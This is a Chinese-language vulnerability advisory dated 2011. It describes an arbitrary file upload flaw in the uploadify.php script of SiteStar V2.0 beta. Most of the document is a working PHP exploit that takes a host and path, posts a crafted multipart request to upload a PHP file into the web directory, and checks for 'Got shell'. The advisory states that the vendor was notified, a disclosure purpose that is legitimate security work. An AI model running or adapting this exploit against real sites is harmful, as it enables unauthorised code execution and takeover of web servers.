SiteStar V2.0任意文件上传漏洞
时间:2011-03-17 来源:cnryan
发布日期:2011-03.16
发布作者:cnryan
影响版本:SiteStar V2.0 beta
官方网站:http://www.sitestar.cn/
漏洞类型:文件上传
漏洞描述:SiteStar V2.0没有正确限制文件的上传,远程攻击者可能利用此漏洞上传任意文件到Web目录,最终导致在服务器上执行任意命令。
漏洞分析: 漏洞产生在 /script/multiupload/uploadify.php 文件:
没什么好说的,低级失误。通过构造html表单可直接上传webshell至web目录,下面提供一段测试代码。
[3]测试代码:
<? print_r(' +---------------------------------------------------------------------------+ SiteStar V2.0 Remote Shell Upload Exploit by cnryan Mail: cnryan2008[at]gmail[dot]com Blog: http://hi.baidu.com/cnryan +---------------------------------------------------------------------------+ '); if ($argc < 3) { print "\nUsage: php $argv[0] host path\n"; print "Example: php $argv[0] localhost /sitestar/\n"; die(); } error_reporting(0); set_time_limit(0); $host = $argv[1]; $path = $argv[2]; $shell = 'http://'.$host.$path.'cnryan.php'; $payload = "-----cnryan\r\n"; $payload .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"cnryan.php\"\r\n"; $payload .= "Content-Type: application/octet-stream\r\n\r\n"; $payload .= "<?php phpinfo();?>W.S.T\r\n-----cnryan\r\n"; $payload .= "Content-Disposition: form-data; name=\"upload\"\r\n\r\n\r\n"; $payload .= "-----cnryan\r\n"; $payload .= "Content-Disposition: form-data; name=\"folder\"\r\n\r\n"; $payload .= "$path\r\n"; $payload .= "-----cnryan--"; $packet = "POST {$path}/script/multiupload/uploadify.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Connection: keep-alive\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=---cnryan\r\n"; $packet .= "Content-Length: ".strlen($payload)."\r\n\r\n"; $packet .= $payload; $fp = fsockopen($host, 80); fputs($fp, $packet); sleep(5); $str=file_get_contents($shell); if(strpos($str,'W.S.T')) exit("OK! Got shell:\t$shell\n"); else exit("Exploit Failed!\n"); ?>[4]漏洞状态:
漏洞已通知厂商。
标签分类: 文件上传
相关阅读 更多 +
排行榜 更多 +
